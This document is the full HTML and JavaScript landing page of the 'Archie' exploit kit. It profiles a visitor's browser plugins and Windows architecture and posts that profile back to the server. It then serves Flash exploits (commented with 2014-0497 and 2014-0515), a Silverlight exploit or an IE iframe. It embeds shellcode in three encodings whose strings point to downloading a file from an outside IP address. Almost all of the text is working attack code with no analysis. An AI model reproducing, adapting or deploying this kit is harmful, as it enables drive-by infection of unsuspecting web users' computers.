Archie Exploit Kit

*** @PhysicalDrive0 ***

2       <html>
3       <head>
4       <script type="text/javascript" src="pluginDet.js"></script>
5       <style type="text/css">
6       html, body { height: 100%; overflow: auto; }
7       body { padding: 0; margin: 0; }
8       #form1 { height: 99%; }
9       #silverlightControlHost { text-align:center; }
10      </style>
11          <meta http-equiv="X-UA-Compatible" content="IE=edge" />
12      </head>
13      <body>
14      </body>
15      <script>
16      var payload = "FCE8A20000006089E531D2648B52308B520C8B52148B7228528B52108B423C8B44027885C0744801D0508B48188B582001D3E33A498B348B01D631FF31C0AC84C07407C1CF0D01C7EBF43B7D2475E3588B582401D3668B0C4B8B581C01D38B048B01D0894424205A61595A51FFE0585A8B12EBA16A40680010000068000400006A006854CAAF91FFD5C389C8C1E902F2A588C180E103F2A4C331C0505051535068361A2F70FFD5C35D686F6E00006875726C6D54688E4E0EECFFD5E8B4FFFFFF505068040100006833CA8A5BFFD5508B74240401C6B065880646B02E880646B064880646B06C880646B06C880646B000
8806EB228B4C24088B1C2451E898FFFFFF688E4E0EECFFD568983A000068B0492DDBFFD5EB21E8D9FFFFFF687474703A2F2F3134342E37362E33362E36373A383038332F6464005858585858C3";
17      var payload2 = "0x0018A164,0xC0830000,0x81208b08,0xFFF830C4,0xA2E8FCFF,0x60000000,0xD231E589,0x30528B64,0x8B0C528B,0x728B1452,0x528B5228,0x3C428B10,0x7802448B,0x4874C085,0x8B50D001,0x588B1848,0xE3D30120,0x348B493A,0x31D6018B,0xACC031FF,0x0774C084,0x010DCFC1,0x3BF4EBC7,0xE375247D,0x24588B58,0x8B66D301,0x588B4B0C,0x8BD3011C,0xD0018B04,0x20244489,0x5A59615A,0x58E0FF51,0xEB128B5A,0x68406AA1,0x00001000,0x00040068,0x68006A00,0x91AFCA54,0x89C3D5FF,0x02E9C1C8,0xC188A5F2,0xF203E180,0xC031C3A4,0x5351
5050,0x1A366850,0xD5FF702F,0x6F685DC3,0x6800006E,0x6D6C7275,0x4E8E6854,0xD5FFEC0E,0xFFFFB4E8,0x685050FF,0x00000104,0x8ACA3368,0x50D5FF5B,0x0424748B,0x65B0C601,0xB0460688,0x4606882E,0x068864B0,0x886CB046,0x6CB04606,0xB0460688,0xEB068800,0x244C8B22,0x241C8B08,0xFF98E851,0x8E68FFFF,0xFFEC0E4E,0x3A9868D5,0xB0680000,0xFFDB2D49,0xE821EBD5,0xFFFFFFD9,0x70747468,0x312F2F3A,0x372E3434,0x36332E36,0x3A37362E,0x33383038,0x0064642F,0x58585858,0x9090C358";
18
19      var payload3 = "/OiiAAAAYInlMdJki1Iwi1IMi1IUi3IoUotSEItCPItEAniFwHRIAdBQi0gYi1ggAdPjOkmLNIsB1jH/McCshMB0B8HPDQHH6/Q7fSR141iLWCQB02aLDEuLWBwB04sEiwHQiUQkIFphWVpR/+BYWosS66FqQGgAEAAAaAAEAABqAGhUyq+R/9XDicjB6QLypYjBgOED8qTDMcBQUFFTUGg2Gi9w/9XDXWhvbgAAaHVybG1UaI5ODuz/1ei0////UFBoBAEAAGgzyopb/9VQi3QkBAHGsGWIBkawLogGRrBkiAZGsGyIBkawbIgGRrAAiAbrIotMJAiLHCRR6Jj///9ojk4O7P/VaJg6AABosEkt2//V6yHo2f///2h0dHA6Ly8xNDQuNzYuMzYuNjc6ODA4My9kZABYWFhYWMOQkJA=";
20
21      function spanAppend(val)
22      {
23          var a = document.createElement("span");
24          document.body.appendChild(a);
25          a.innerHTML = val;
26      }
27
28      function flashLow()
29      {
30          spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /><param name="movie" value="flashlow.swf" /><param name="allowScriptAccess" value="always" /><param name="FlashVars" value="id='+payload+'" /><param name="Play" valu
e="true" /></object>');
31      }
32
33      function flashHigh()
34      {
35          spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf"><param name="movie" value="flashhigh.swf" /><param name="FlashVars" value="sh='+payload2+'" /></object>');
36      }
37
38      function silverHigh()
39      {
40          spanAppend('<form id="form1" runat="server" ><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="silverapp1.xap"/><param name="background" value="white" /><param name="InitParams" value="payload='+p
ayload3+'" /></object></div></form>');
41      }
42
43      function fV(val)
44      {
45          return PluginDetect.isMinVersion("Flash", val);
46      }
47
48      function sV(val)
49      {
50          return PluginDetect.isMinVersion("Silverlight", val);
51      }
52
53      function ie(turl)
54      {
55      w = "frameBorder";
56      r = "width";
57      q = "iframe";
58      s = "height";
59      z = "createElement";
60      c = "src";
61      g = '10';
62      hh = turl;
63      ha = document.createElement(q);
64      ha[w] = '0';
65      ha[r] = g;
66      ha[s] = g;
67      b = ha[c] = hh;
68      document.body.appendChild(ha);
69      return;
70      }
71
72      function ieVerOk()
73      {
74          t = "test";
75      try {
76      j = window.navigator.userAgent.toLowerCase();
77      x = /MSIE[\/\s]\d+/i [t](j);
78      m = /Win64;/i [t](j);
79      z = /Trident\/(\d)/i [t](j) ? parseInt(RegExp.$1) : null;
80      if (!m && x && z && (z == 6 || z == 5 || z == 4)) {
81      return true
82      }
83      } catch (exc) {}
84      return false
85      }
86
87      function ieVer() {
88      t = "test";
89      try {
90          if (window.msCrypto)
91              return 11;
92          if (window.atob)
93              return 10;
94          if (document.addEventListener)
95              return 9;
96          if (window.JSON && document.querySelector)
97              return 8;
98          if (window.XMLHttpRequest)
99              return 7;
100     } catch (exc) { }
101     return 0
102     }
103
104     function arch() {
105     try
106     {
107     var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
108     xmlDoc.async = false;
109     xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe">');
110     if (xmlDoc.parseError.errorCode == -2147023083)
111     {
112     return 64;
113     }
114     }
115     catch (ex)
116     {
117     return 0;
118     }
119     return 32;
120     }
121
122     var flashVer = PluginDetect.getVersion("Flash");
123     var Branch = 0;
124     if (flashVer == "11,0,1,152"
125     || flashVer == "11,1,102,55" || flashVer == "11,1,102,62"
126     || flashVer == "11,1,102,63" || flashVer == "11,2,202,228"
127     || flashVer == "11,2,202,233" || flashVer == "11,2,202,235")
128         Branch = 1;
129
130
131     if (fV("11,3,300,257") == 1 && (fV("11,7,700,276") == -0.1))
132         Branch = 2;
133     if (fV("11,8,800,94") == 1 && (fV("13,0,0,183") == -0.1))
134         Branch = 2;
135
136     var silverVer = PluginDetect.getVersion("Silverlight");
137     var silverBranch = 0;
138     if (sV("4,0,50401,0") == 1 && sV("5,1,10412,0") == -0.1)
139         silverBranch = 1;
140
141
142     var adoberVer = PluginDetect.getVersion("AdobeReader");
143     var adoberBranch = 0;
144
145     var archSys = arch();
146     var ieVersion = 0;
147     if (archSys != 0)
148         ieVersion = ieVer();
149
150     var sendstr = "";
151     sendstr += encodeURI("dump=" + flashVer + "|" + silverVer + "|" + adoberVer + "|" + archSys + "|" + ieVersion + "|" + Branch);
152     sendstr += encodeURI("&ua=" + window.navigator.userAgent);
153     sendstr += encodeURI("&ref=" + document.referrer);
154
155     if (Branch == 0 && silverBranch == 1)
156     Branch = 3;
157     if (Branch == 0 && archSys != 0)
158         Branch = 4;
159
160     try
161     {
162     var xmlhttp = new XMLHttpRequest();
163     xmlhttp.open("POST", "/foo", false);
164     xmlhttp.send(sendstr);
165     }
166     catch (exc){}
167
168
169     switch (Branch)
170     {
171         //2014-0497
172         case 1:
173         flashLow();
174         break;
175
176         //2014-0515
177         case 2:
178         flashHigh();
179         break;
180
181         case 3:
182         silverHigh();
183         break;
184
185         case 0:
186         case 4:
187         //var avar = archSys == 32 ? 0 : 1;
188     //ie("/phazar.html?a="+avar);
189
190         ie("/iebasic.html");
191         break;
192     }
193
194
195     </script>
196     </html>